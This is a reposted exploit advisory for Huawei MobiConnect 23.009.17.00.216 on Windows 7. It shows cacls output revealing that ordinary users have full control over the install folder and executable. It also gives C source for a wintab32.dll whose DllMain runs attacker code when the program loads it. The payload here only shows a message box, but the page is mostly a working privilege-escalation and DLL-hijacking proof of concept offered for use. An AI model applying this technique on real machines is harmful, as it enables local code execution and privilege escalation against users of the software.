facebook facebook twitter rss

MobiConnect 23.009.17.00.216 HUAWEI Insecure Permissions Local Privilege Escalation & DLL Hijacking Exploit (wintab32.dll)

Author: Hadji Samir , Published: 02-01-2015
/* 
* Exploit Title: MobiConnect 23.009.17.00.216 HUAWEI Insecure Permissions Local Privilege Escalation & DLL Hijacking Exploit (wintab32.dll)
* Date: 25/12/2014
* Author: Hadji Samir s-dz@hotmail.fr
* Vendor Homepage: http://www.mobilis.dz/entreprises/mobiconnect.php
* Vendor: http://www.huawei.com/
* Tested on: windows 7 FR

##################### Insecure Permissions Local Privilege Escalation ####################
C:\Program Files>cacls "MobiConnect"
C:\Program Files\MobiConnect BUILTIN\Utilisateurs:(OI)(IO)F
BUILTIN\Utilisateurs:(CI)F
NT SERVICE\TrustedInstaller:(ID)F
NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
AUTORITE NT\Système:(ID)F
AUTORITE NT\Système:(OI)(CI)(IO)(ID)F
BUILTIN\Administrateurs:(ID)F
BUILTIN\Administrateurs:(OI)(CI)(IO)(ID)F
CREATEUR PROPRIETAIRE:(OI)(CI)(IO)(ID)F
C:\Program Files\MobiConnect>cacls "MobiConnect.exe"
C:\Program Files\MobiConnect\MobiConnect.exe BUILTIN\Utilisateurs:F
AUTORITE NT\Système:(ID)F
BUILTIN\Administrateurs:(ID)F

########################DLL Hijacking Exploit (wintab32.dll)#########################

*/

#include <windows.h>

BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{
switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
owned();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}

int owned() {
MessageBox(0, "MobiConnect DLL Hijacked\Hadji Samir", "POC", MB_OK);
}

Like us on Facebook :